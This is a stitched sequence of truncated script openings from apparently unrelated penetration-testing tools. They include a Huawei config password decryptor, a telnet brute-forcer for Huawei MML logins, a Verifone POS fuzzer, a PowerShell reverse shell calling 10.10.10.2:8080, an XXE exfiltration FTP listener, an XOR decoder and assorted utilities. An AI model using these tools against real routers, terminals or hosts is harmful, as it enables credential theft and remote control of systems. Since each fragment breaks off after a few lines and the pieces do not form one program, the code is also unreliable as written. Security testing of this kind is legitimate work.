#!/usr/bin/python
"""
Simple tool to extract local users and passwords from most Huawei routers/firewalls config files.
Will extract plain-text passwords and crypted credentials. Huawei config files use DES encryption with
a known key. Using this information, the script will decrypt credentials found in the config file.
Author: Etienne Stalmans (etienne@sensepost.com)
Version: 1.0 (12/01/2014)
"""
from Crypto.Cipher import DES

#!/usr/bin/python
"""
Brute-force tool to find the username/password for MML on a Huawei device.
Author: Etienne Stalmans (etienne@sensepost.com)
Version: 1.0 (14/01/2014)
"""
import sys
import telnetlib

#!/usr/bin/env python
'''
Script for fuzzing verifone terminal/pos devices. This is a bad reverse-engineer and implementation of the official protocol: http://web.archive.org/web/20120603221525/http://www.verifone.com/PDF/guides/tcl_ref.pdf
Should work fine. Official docs were only found after the initial implementation. Not fully tested with CRC-16 checksum correctly implemented.
Author: etienne@sensepost.com
Version: 1.0
License: GNU GENERAL PUBLIC LICENSE (GNU) Version 2
'''

$socket = new-object System.Net.Sockets.TcpClient('10.10.10.2', 8080);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do{
    $writer.Write("> ");
    $writer.Flush();
    $read = $null;

#!/usr/bin/env python
import sys
if len(sys.argv) < 2:
    print "Enter IP address as first argument: python %s 127.0.0.1"%sys.argv[0]
    sys.exit(1)
ip = sys.argv[1]
ips = ip.split('.')
iph = '0x{:02X}.0x{:02X}.0x{:02X}.0x{:02X}'.format(*map(int, ips))

#!/usr/bin/env python
from __future__ import print_function
import socket
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind(('0.0.0.0',2121))
s.listen(1)
print('XXE-FTP listening ')
conn,addr = s.accept()
# addr is a (host, port) tuple, so wrap it before %-formatting
print('Connected by %s' % (addr,))

Create a sha256 hash (in uppercase) for each line in a file:
awk '{printf "%s - ",$1 }{"echo -n "$1"|sha256sum"|getline d;split(d,a,"-"); print toupper(a[1])}' notes.txt
For each line in 'reps.txt', create a random string of the correct length and do a replace.
for i in `cat reps.txt`; do
    x=`cat /dev/urandom | tr -dc 'a-zA-Z' | fold -w ${#i} | head -n 1`; echo $x;
    sed -i "s/$i/$x/g" x6 ;
done

#! /bin/bash
# PDF signing in Linux
# Author: etienne@sensepost.com
# Version: 1.0 16 October 2015
# Requirements: xv, imagemagick
# Check if requirements are met:
if ! which convert 2>/dev/null; then
    echo "ImageMagick not installed and is required"
    exit 1
fi

#!/usr/bin/env python
import sys
import binascii
tmp = binascii.a2b_base64(sys.argv[1])
out = ""
for x in tmp:
    out += chr(ord(x)^95) #xor with the underscore char (_)

FROM ubuntu:14.04
MAINTAINER Etienne Stalmans, etienne@sensepost.com
RUN apt-get update && apt-get install -y \
    unzip \
    iptables
RUN apt-get install -y \
    build-essential \